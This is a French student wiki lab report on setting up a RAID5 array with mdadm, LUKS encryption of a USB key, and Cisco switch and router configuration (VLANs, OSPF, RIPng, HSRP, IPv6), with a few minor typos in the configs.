Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
Le cryptage des données s'effectue grâce à l'utilitaire [https://doc.ubuntu-fr.org/cryptsetup cryptsetup]. Pour se faire, on commence par chercher le nom de la clef USB cible dans le gestionnaire :&lt;br /&gt;
      lsblk&lt;br /&gt;
Dans notre cas,le périphérique cible est nommé '''sdb1'''&lt;br /&gt;
On va acceder aux partitions via :&lt;br /&gt;
      fdisk /dev/sdb1&lt;br /&gt;
Le menu suivant apparait alors :&lt;br /&gt;
   Welcome to fdisk (util-linux 2.25.2).&lt;br /&gt;
   Changes will remain in memory only, until you decide to write them.&lt;br /&gt;
   Be careful before using the write command.&lt;br /&gt;
   Command (m for help):&lt;br /&gt;
On va d'abord nettoyer la clef avant d'y crypter nos données, pour cela on entre le choix 'd' et on supprime les partitions existantes.&lt;br /&gt;
&lt;br /&gt;
Puis pour créer une nouvelle partition on entre le choix 'n' puis 'p' qui correspond à :&lt;br /&gt;
'''n''' nouvelle partition&lt;br /&gt;
'''p''' partition primaire&lt;br /&gt;
&lt;br /&gt;
Command (m for help): n&lt;br /&gt;
Partition type&lt;br /&gt;
   p   primary (0 primary, 0 extended, 4 free)&lt;br /&gt;
   e   extended (container for logical partitions)&lt;br /&gt;
Select (default p):&lt;br /&gt;
&lt;br /&gt;
Using default response p.&lt;br /&gt;
Partition number (1-4, default 1):&lt;br /&gt;
First sector (2048-1953525167, default 2048):&lt;br /&gt;
Last sector, +sectors or +size{K,M,G,T,P} (2048-1953525167, default 1953525167):&lt;br /&gt;
Created a new partition 1 of type 'Linux' and of size xxxx.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis on sauvegarde : &lt;br /&gt;
&lt;br /&gt;
Command (m for help): w&lt;br /&gt;
The partition table has been altered.&lt;br /&gt;
Calling ioctl() to re-read partition table.&lt;br /&gt;
Syncing disks.&lt;br /&gt;
&lt;br /&gt;
La clef est prête, on peut desormais crypter avec l'utilitaire cyptsetup &lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/sdb1&lt;br /&gt;
    cryptsetup open --type luks /dev/sdb1 clef_ima2a_G5&lt;br /&gt;
    mkfs.ext4 /dev/mapper/clef_ima2a_G5&lt;br /&gt;
    mount -t ext4 /dev/mapper/clef_ima2a_G5 /mnt/clef&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur ====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E306 !! E304&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/1 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 1/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/3 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 2/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 5/1(E306) &amp;amp; Ge 1/1(E304) &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 1/1(E306) &amp;amp; Ge 2/2(E304) &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   ip routing&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.254   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.6 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface BDI1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   int vlan 130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
   ip rooting&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.253   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
   &lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan2&lt;br /&gt;
   ip address 10.60.1.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 2 ip 10.60.1.252&lt;br /&gt;
   standby 2 preempt&lt;br /&gt;
   exit&lt;br /&gt;
     &lt;br /&gt;
   interface Vlan3&lt;br /&gt;
   ip address 10.60.2.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252&lt;br /&gt;
   standby 3 preempt&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface Vlan4&lt;br /&gt;
   ip address 10.60.3.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252&lt;br /&gt;
   standby 4 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan5&lt;br /&gt;
   ip address 10.60.4.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252&lt;br /&gt;
   standby 5 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan6&lt;br /&gt;
   ip address 10.60.5.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252&lt;br /&gt;
   standby 6 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan7&lt;br /&gt;
   ip address 10.60.6.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2201:660:4401:60B7::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 10.60.6.252&lt;br /&gt;
   standby 7 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan42&lt;br /&gt;
   ip address 193.48.57.174 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 42 ip 193.48.57.172&lt;br /&gt;
   standby 42 preempt&lt;br /&gt;
   exit&lt;br /&gt;
          &lt;br /&gt;
   interface Vlan130&lt;br /&gt;
   ip address 192.168.222.2 255.255.255.248&lt;br /&gt;
   ipv6 address FE80::42:3 link-local&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51406</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51406"/>
				<updated>2019-11-29T11:44:18Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Mdadm : Gestionnaire de RAID Logiciel */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
